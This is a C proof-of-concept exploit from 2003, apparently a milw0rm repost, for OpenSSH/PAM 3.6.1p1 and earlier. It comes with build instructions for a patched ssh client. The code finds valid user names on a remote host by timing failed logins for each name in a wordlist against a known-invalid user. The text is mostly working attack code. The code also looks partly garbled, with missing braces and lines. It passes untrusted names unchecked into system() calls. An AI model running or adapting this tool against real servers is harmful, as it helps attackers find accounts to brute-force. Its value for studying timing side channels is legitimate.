* SSH_BRUTE - OpenSSH/PAM <= 3.6.1p1 remote users discovery tool
* Copyright (c) 2003 @ Mediaservice.net Srl. All rights reserved
* Vulnerability discovered by Marco Ivaldi <raptor@mediaservice.net>
* Proof of concept code by Maurizio Agazzini <inode@mediaservice.net>
* Tested against Red Hat, Mandrake, and Debian GNU/Linux.
* Reference: http://lab.mediaservice.net/advisory/2003-01-openssh.txt
* $ tar xvfz openssh-3.6.1p1.tar.gz
* $ patch -p0 <openssh-3.6.1p1_brute.diff
* patching file openssh-3.6.1p1/ssh.c
* patching file openssh-3.6.1p1/sshconnect.c
* patching file openssh-3.6.1p1/sshconnect1.c
* patching file openssh-3.6.1p1/sshconnect2.c
* $ cd openssh-3.6.1p1
* $ ./configure
* $ make
* $ cc ../ssh_brute.c -o ssh_brute
* $ ./ssh_brute 1 list.txt
#include <stdio.h>
#include <stdlib.h>
#include <sys/wait.h>
/* an illegal user */
#define NO_USER "not_val_user"
/* path of the patched ssh */
#define PATH_SSH "./ssh"
/* max time range for invalid user */
#define TIME_RANGE 3
int main(int argc, char *argv[])
FILE * in;
char buffer[2000], username[100], *host;
int time_non_valid = 0, time_user = 0;
int version = 1, i = 0, ret;
fprintf(stderr, "\n SSH_BRUTE - OpenSSH/PAM <= 3.6.1p1 remote users discovery tool\n");
fprintf(stderr, " Copyright (c) 2003 @ Mediaservice.net Srl. All rights reserved\n");
if (argc < 3) {
fprintf(stderr, "\n Usage: %s <protocol version> <user file> <host>\n\n", argv[0]);
version = atoi(argv[1]);
host = argv[3];
if ( ( in = fopen(argv[2], "r") ) == NULL ) {
fprintf(stderr, "\n Can't open %s\n", argv[2]);
/* test an illegal user */
printf("\n Testing an illegal user\t: ");
sprintf(buffer, "%s -%d %s@%s", PATH_SSH, version, NO_USER, host);
for (i = 0; i < 3; i++) {
ret = system(buffer);
time_non_valid += WEXITSTATUS(ret);
time_non_valid /= 3;
printf("%d second(s)\n\n", time_non_valid);
time_non_valid += TIME_RANGE;
/* test supplied users */
fscanf(in, "%s", username);
while ( !feof(in) ) {
printf(" Testing login %s\t", username);
if (strlen(username) <= 8)
printf(": ");
fflush( stdout );
sprintf(buffer, "%s -%d %s@%s", PATH_SSH, version, username, host);
ret = system(buffer);
time_user = WEXITSTATUS(ret);
if (time_user <= time_non_valid)
printf("\E[31m\E[1mILLEGAL\E[m\t[%d second(s)]\n", time_user);
else {
/* valid user? test it again to be sure */
ret = system(buffer);
time_user = WEXITSTATUS(ret);
if (time_user <= time_non_valid)
printf("\E[31m\E[1mILLEGAL\E[m\t[%d second(s)] [2 test]\n", time_user);
printf("\E[32m\E[1mUSER OK\E[m\t[%d second(s)]\n", time_user);
fscanf(in, "%s", username);
// milw0rm.com [2003-04-30]